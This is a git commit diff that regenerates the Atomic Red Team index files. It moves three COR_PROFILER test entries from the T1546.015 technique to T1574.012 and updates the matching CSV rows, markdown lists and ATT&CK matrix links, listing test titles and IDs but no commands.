Generate docs from job=validate_atomics_generate_docs branch=master

2020-08-18 17:34:50 +00:00
parent c288b163f7
commit d55d047117
10 changed files with 627 additions and 294 deletions
@@ -16,10 +16,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -96,10 +96,10 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
@@ -221,6 +221,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
+defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
 defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
 defense-evasion,T1070.003,Clear Command History,3,Clear Bash history (cat dev/null),b1251c35-dcd3-4ea1-86da-36d27b54f31f,sh
@@ -13,10 +13,10 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod
 privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell
 privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt
 privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
+privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-privilege-escalation,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-privilege-escalation,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -65,6 +65,9 @@ defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Tru
 defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell
 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
+defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
 defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
 defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
@@ -207,10 +210,10 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
+persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
+persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
-persistence,T1546.015,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
-persistence,T1546.015,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
-persistence,T1546.015,Component Object Model Hijacking,3,COM Hijack Leveraging registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
 persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
 persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
 persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -31,14 +31,14 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.003 Cron](../../T1053.003/T1053.003.md)
@@ -204,16 +204,16 @@
  - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
  - Atomic Test #3: Firefox [linux, windows, macos]
  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
 - T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -467,7 +467,10 @@
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1070.003 Clear Command History](../../T1070.003/T1070.003.md)
  - Atomic Test #1: Clear Bash history (rm) [linux, macos]
  - Atomic Test #2: Clear Bash history (echo) [linux, macos]
@@ -26,13 +26,13 @@
  - Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1574.001 DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
@@ -139,7 +139,10 @@
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1070.001 Clear Windows Event Logs](../../T1070.001/T1070.001.md)
  - Atomic Test #1: Clear Logs [windows]
  - Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
@@ -399,14 +402,14 @@
  - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
  - Atomic Test #3: Firefox [linux, windows, macos]
  - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1574.012 COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
+  - Atomic Test #1: User scope COR_PROFILER [windows]
+  - Atomic Test #2: System Scope COR_PROFILER [windows]
+  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
-  - Atomic Test #1: COM Hijack Leveraging user scope COR_PROFILER [windows]
-  - Atomic Test #2: COM Hijack Leveraging System Scope COR_PROFILER [windows]
-  - Atomic Test #3: COM Hijack Leveraging registry-free process scope COR_PROFILER [windows]
+- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -10,20 +10,20 @@
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DCSync [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Windows Event Logs](../../T1070.001/T1070.001.md) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Launchd](../../T1053.004/T1053.004.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | [SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Encrypted Channel](../../T1573/T1573.md) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | COR_PROFILER [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
+| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Compile After Delivery](../../T1027.004/T1027.004.md) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Share Discovery](../../T1135/T1135.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Native API](../../T1106/T1106.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Golden Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
